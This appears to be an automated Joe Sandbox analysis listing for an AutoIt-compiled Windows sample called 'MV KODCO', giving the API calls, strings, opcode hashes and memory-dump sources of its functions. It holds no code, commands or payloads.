                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: LengthMessageSendTextWindow
                                                          • String ID: edit
                                                          • API String ID: 2978978980-2167791130
                                                          • Opcode ID: 8c600afa645aef8e4a96a083c9e970ae66099f99a4e79561e2e98bcd1fcbc7ff
                                                          • Instruction ID: a853b10835e484afc6c2dc8d672903a853d2fdfe654a9ad4b0050f057b48f8a7
                                                          • Opcode Fuzzy Hash: 8c600afa645aef8e4a96a083c9e970ae66099f99a4e79561e2e98bcd1fcbc7ff
                                                          • Instruction Fuzzy Hash: D1116A71540108AAFB205F64DC44EEB3B6BEB05378F115714F965972E0C775AC519B60
                                                          APIs
                                                          • _memset.LIBCMT ref: 006252D5
                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006252F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: 97a17c434013137c471be796fe7a65b315c1a157f02b3b1aee3f6841182851b7
                                                          • Instruction ID: 1825cba30c03723ce2f0a6447b3501c11fe5105fa3c659cf34d9c84d322401f1
                                                          • Opcode Fuzzy Hash: 97a17c434013137c471be796fe7a65b315c1a157f02b3b1aee3f6841182851b7
                                                          • Instruction Fuzzy Hash: B0119675901A34EBDB30EA98E944BDD77AA9B06790F141016E943A72D0E3B0EE05CF91
                                                          APIs
                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00634DF5
                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00634E1E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Internet$OpenOption
                                                          • String ID: <local>
                                                          • API String ID: 942729171-4266983199
                                                          • Opcode ID: dc7cd610eff0fd090e3d5dd22db7a424be89c94fce0e9b85ba4630b9bbae75b6
                                                          • Instruction ID: bac6d2b5c964fb03739cb3532f54b5e9c412d373a8899794c056a2828b65418c
                                                          • Opcode Fuzzy Hash: dc7cd610eff0fd090e3d5dd22db7a424be89c94fce0e9b85ba4630b9bbae75b6
                                                          • Instruction Fuzzy Hash: 65117070601221BBDB258F51C889EFBFFAAFF16755F10822AF51556240DB706945C6E0
                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006137A7
                                                          • ___raise_securityfailure.LIBCMT ref: 0061388E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                                          • String ID: (j
                                                          • API String ID: 3761405300-3520477249
                                                          • Opcode ID: 9eb96ecbb88469c4a5789865512291f139f207a0a310e4f6818496a7238d12c3
                                                          • Instruction ID: a41064d05f3132c26f9823d31e7dedeb1bb062a7485ff3976ab14df7ff401ac6
                                                          • Opcode Fuzzy Hash: 9eb96ecbb88469c4a5789865512291f139f207a0a310e4f6818496a7238d12c3
                                                          • Instruction Fuzzy Hash: 1E21E2B5540204DAEB40FF55E9956407BF7BB4E310F14A86AE5098B3B0E3B17984EF8A
                                                          APIs
                                                          • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0063A84E
                                                          • htons.WSOCK32(00000000,?,00000000), ref: 0063A88B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: htonsinet_addr
                                                          • String ID: 255.255.255.255
                                                          • API String ID: 3832099526-2422070025
                                                          • Opcode ID: 8772cc95b080c02161faafd41001d8cfca43c02ac80559704e3599031e4cedb9
                                                          • Instruction ID: cd9a62916f68c01e9c06941bb9fec05c9d90f44eebbd03c7931fc212e64b3c69
                                                          • Opcode Fuzzy Hash: 8772cc95b080c02161faafd41001d8cfca43c02ac80559704e3599031e4cedb9
                                                          • Instruction Fuzzy Hash: 22012634200304ABCB109FA8C886FEDB766EF44320F10842AF551973D1C771E802D796
                                                          APIs
                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0061B7EF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 3850602802-1403004172
                                                          • Opcode ID: 01ecf860c6305450c43081ba40dc56fe23e01ea0e373eef56f86ef9c1b820933
                                                          • Instruction ID: cfb9bed9d449e87deeb8b87f1919ab8fc7d21d72436625f9ecc11bd0827dd2a4
                                                          • Opcode Fuzzy Hash: 01ecf860c6305450c43081ba40dc56fe23e01ea0e373eef56f86ef9c1b820933
                                                          • Instruction Fuzzy Hash: CA014771601115BBCB48EBA8CC52DFE376FBF45310B08061CF4A2A72C2EF7098098790
                                                          APIs
                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 0061B6EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 3850602802-1403004172
                                                          • Opcode ID: 719a49b2533938669683f3eb25ad58297033a92636e147b64193393493ddc12b
                                                          • Instruction ID: b6e7f96c841bc660700bee0a33ab226e37f5065d641a7e37ca807c0a5a2dc019
                                                          • Opcode Fuzzy Hash: 719a49b2533938669683f3eb25ad58297033a92636e147b64193393493ddc12b
                                                          • Instruction Fuzzy Hash: 5501F271A40105BBCB08EBA5C962AFE37AEAF15300F14001CF442B32C1DF909E0987F5
                                                          APIs
                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 0061B76C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 3850602802-1403004172
                                                          • Opcode ID: ecce61f8da1b61582f8c6d2f4aee17ead9a2beb96352d67a38af6e62c2ec3065
                                                          • Instruction ID: 467483bc397fa1fd5f418732a9df505f1f0937d5887a1a0e637475dbc8afaa45
                                                          • Opcode Fuzzy Hash: ecce61f8da1b61582f8c6d2f4aee17ead9a2beb96352d67a38af6e62c2ec3065
                                                          • Instruction Fuzzy Hash: 58012671640105BBCB04E7A4C916EFE37AFAB45300F540019F441B32D2DBA09E4A87B5
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: __calloc_crt
                                                          • String ID: "j
                                                          • API String ID: 3494438863-4007942906
                                                          • Opcode ID: 1d1de3342dee7c3856c96fc734f374f6801d6384bf7fae693a6a12034a731e09
                                                          • Instruction ID: e91cf23dddf1304d93a09c216995565325cf0bb9f80a2ad4c7609d27fa556634
                                                          • Opcode Fuzzy Hash: 1d1de3342dee7c3856c96fc734f374f6801d6384bf7fae693a6a12034a731e09
                                                          • Instruction Fuzzy Hash: F1F0F4B02C82039AE738AF1DBC607A767D7EB01720B10001EF300CA2D5EB30E9414A98
                                                          APIs
                                                          • LoadImageW.USER32(005E0000,00000063,00000001,00000010,00000010,00000000), ref: 005E4048
                                                          • EnumResourceNamesW.KERNEL32(00000000,0000000E,006267E9,00000063,00000000,75C10280,?,?,005E3EE1,?,?,000000FF), ref: 006541B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: EnumImageLoadNamesResource
                                                          • String ID: >^
                                                          • API String ID: 1578290342-690483986
                                                          • Opcode ID: 79a86670344b968d53f3bcf1249982ff6bf4cbc77f03ece914f163a4af484c8b
                                                          • Instruction ID: 0753d03503ba7085c91eb43be7096ca5a2491bbde2a5abb6f2790d6e0f3d3e2c
                                                          • Opcode Fuzzy Hash: 79a86670344b968d53f3bcf1249982ff6bf4cbc77f03ece914f163a4af484c8b
                                                          • Instruction Fuzzy Hash: 22F06D31740360B7E3206B1ABC4AFD23EAAAB07BB5F101506F625AE1D0D6E0A4808E94
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp
                                                          • String ID: #32770
                                                          • API String ID: 2292705959-463685578
                                                          • Opcode ID: b3e0af3e33668092485f2c9dcdc78216bebdc9976bf4d31e4e9130d6afd170ae
                                                          • Instruction ID: f1025c2cac7bf70dad3b2f187f659a976dd9e7d18014a5b8e025b4fd82059b23
                                                          • Opcode Fuzzy Hash: b3e0af3e33668092485f2c9dcdc78216bebdc9976bf4d31e4e9130d6afd170ae
                                                          • Instruction Fuzzy Hash: 77E0D877A0433527DB10EAA5EC09ECBFBADEB56760F01001AF905D7181E6B0E7018BD4
                                                          APIs
                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0061A63F
                                                            • Part of subcall function 006013F1: _doexit.LIBCMT ref: 006013FB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Message_doexit
                                                          • String ID: AutoIt$Error allocating memory.
                                                          • API String ID: 1993061046-4017498283
                                                          • Opcode ID: aa4529b531bf519ab6b0ac5d0be478ba4c2fdaed4b90ca06da0cc4b13596e548
                                                          • Instruction ID: 6a8d418eb5a79243625e5edca43aa12ec3e24564ff39c4625ed56b679886220f
                                                          • Opcode Fuzzy Hash: aa4529b531bf519ab6b0ac5d0be478ba4c2fdaed4b90ca06da0cc4b13596e548
                                                          • Instruction Fuzzy Hash: 1AD02B313C436833C31836A96C1BFC5394D9F05B55F080415FB0C955C24DE2858002E9
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?), ref: 0065ACC0
                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0065AEBD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: DirectoryFreeLibrarySystem
                                                          • String ID: WIN_XPe
                                                          • API String ID: 510247158-3257408948
                                                          • Opcode ID: a4ea35d7bedeb6b2cca7909e9aeb5a91d2980b2c7bf5ecaf6e18b8e08cace30a
                                                          • Instruction ID: 82d545877c3d534701f5371eead58b9e48eb69e2d2b7554ded3d7da09851accb
                                                          • Opcode Fuzzy Hash: a4ea35d7bedeb6b2cca7909e9aeb5a91d2980b2c7bf5ecaf6e18b8e08cace30a
                                                          • Instruction Fuzzy Hash: E3E06570C00149DFCB11DBE4D9549ECF7BAAB48301F109185E512B2260C7B05A49DF31
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006486E2
                                                          • PostMessageW.USER32(00000000), ref: 006486E9
                                                            • Part of subcall function 00627A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00627AD0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: d951588abe8192798d257c36d61b828e78d8c0ba4d304215c0ea91f5471eb285
                                                          • Instruction ID: ae24bb12891ab024293179e6d6cda60af4f5b716a0887a8483a5fd9ece3c6e8a
                                                          • Opcode Fuzzy Hash: d951588abe8192798d257c36d61b828e78d8c0ba4d304215c0ea91f5471eb285
                                                          • Instruction Fuzzy Hash: 4BD0C931B853247BE7646770AC0BFC66A1A9B08B21F111819F646EA1D0C9E0A9408A59
                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006486A2
                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006486B5
                                                            • Part of subcall function 00627A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00627AD0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: 2cf46a2bc1e206f1d6daef88b8aca2098991451e9e8285adf2bab28827c1841d
                                                          • Instruction ID: f47be54d6db957bf4a021926535cad9fc2e0c8f2b1122015fdc3ba1bdd5cf43c
                                                          • Opcode Fuzzy Hash: 2cf46a2bc1e206f1d6daef88b8aca2098991451e9e8285adf2bab28827c1841d
                                                          • Instruction Fuzzy Hash: A1D01235B84324B7E7746770EC0BFD67A1A9B04B21F111819F74AEA1D0C9E0E940CB54